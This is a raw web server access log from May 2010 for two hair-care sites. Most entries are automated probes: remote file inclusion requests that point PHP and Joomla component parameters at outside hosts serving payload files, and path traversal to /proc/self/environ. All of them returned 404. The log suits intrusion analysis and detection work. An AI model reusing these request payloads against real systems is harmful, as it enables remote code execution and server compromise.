87.106.78.123 - - [24/May/2010:07:18:36 -0700] "GET /logs/access_100426.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.806" "growlonghairfast.com"
77.88.25.28 - - [24/May/2010:07:19:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13426 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:20:18 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:20:18 -0700] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:20:23 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
87.250.77.10 - - [24/May/2010:07:20:24 -0700] "GET /logs/access_100426.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:07:21:07 -0700] "GET /logs/access_100426.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:22:30 -0700] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:22:31 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:22:40 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:22:44 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:22:44 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:22:44 -0700] "GET /logs/access_100125.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:23:23 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:23:26 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:24:00 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.250.77.10 - - [24/May/2010:07:25:21 -0700] "GET /logs/access_100426.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:25:59 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:25:59 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:25:59 -0700] "GET /logs/access_100125.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:26:53 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:26:53 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:26:56 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [24/May/2010:07:28:22 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [24/May/2010:07:28:22 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [24/May/2010:07:28:22 -0700] "GET /logs/access_091123.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [24/May/2010:07:28:22 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [24/May/2010:07:28:22 -0700] "GET /logs/access_091123.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [24/May/2010:07:28:27 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.76.135 - - [24/May/2010:07:30:38 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.205.76.135 - - [24/May/2010:07:30:59 -0700] "GET /logs/access_100510.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.205.76.135 - - [24/May/2010:07:30:59 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.205.76.135 - - [24/May/2010:07:30:59 -0700] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
184.73.46.65 - - [24/May/2010:07:31:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.46.65 - - [24/May/2010:07:31:07 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14990 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:46 -0700] "GET /logs/access_100222.log%20%20//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:46 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:47 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:56 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:56 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.205.76.135 - - [24/May/2010:07:31:56 -0700] "GET /logs/access.log/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:59 -0700] "GET /logs/access_100208.log%20%20//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:31:59 -0700] "GET /logs/access_100222.log%20%20//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:32:10 -0700] "GET /logs/access_100208.log%20%20//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:07:33:04 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:33:36 -0700] "GET /logs//cauta.php?q=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:33:40 -0700] "GET /logs/access_100503.log%20%20//cauta.php?q=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.4.40 - - [24/May/2010:07:35:01 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.billsmithgenealogy.co.uk/Ftree/media/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.4.40 - - [24/May/2010:07:35:20 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.billsmithgenealogy.co.uk/Ftree/media/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.4.40 - - [24/May/2010:07:35:21 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.billsmithgenealogy.co.uk/Ftree/media/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:35:41 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:35:41 -0700] "GET /logs/access_091123.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:35:41 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:35:41 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:35:41 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:35:41 -0700] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [24/May/2010:07:35:49 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:07:35:51 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:07:35:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.79.246.241 - - [24/May/2010:07:36:48 -0700] "GET /logs/access_100426.log//index.php?basedir=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:07:36:53 -0700] "GET /logs/access_100125.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:07:36:55 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
59.42.10.71 - - [24/May/2010:07:36:58 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:37:54 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:37:54 -0700] "GET /logs/access_091123.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:37:54 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:37:54 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:37:54 -0700] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:37:54 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:04 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:38:04 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:38:04 -0700] "GET /logs/access_091123.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:38:04 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:04 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:04 -0700] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:19 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:19 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:20 -0700] "GET /logs/access.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:38:20 -0700] "GET /logs/access_091123.log%20%20//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:38:20 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:38:20 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:39:10 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:39:10 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:39:14 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.36.4.40 - - [24/May/2010:07:39:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.billsmithgenealogy.co.uk/Ftree/media/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.4.40 - - [24/May/2010:07:39:45 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.billsmithgenealogy.co.uk/Ftree/media/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.36.4.40 - - [24/May/2010:07:40:00 -0700] "GET /logs/access_100405.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.billsmithgenealogy.co.uk/Ftree/media/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.180.42.218 - - [24/May/2010:07:40:46 -0700] "GET /bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:40:46 -0700] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.180.42.218 - - [24/May/2010:07:40:50 -0700] "GET /logs/access.log%20%20//bbs//skin/zero_vote/error.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:41:05 -0700] "GET /logs/access_100322.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:42:24 -0700] "GET /cauta.php?q=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:42:27 -0700] "GET /logs/access_100503.log%20%20//cauta.php?q=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.248.150.84 - - [24/May/2010:07:42:27 -0700] "GET /logs//cauta.php?q=http://no.no-ip.com/images/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.254.228.146 - - [24/May/2010:07:43:09 -0700] "GET /logs/access.log//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:43:09 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:43:10 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:43:16 -0700] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:43:16 -0700] "GET /skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.254.228.146 - - [24/May/2010:07:43:17 -0700] "GET /logs/access.log//skin/happycast_category_lightblack/login.php?dir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:43:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.248.150.84 - - [24/May/2010:07:43:21 -0700] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
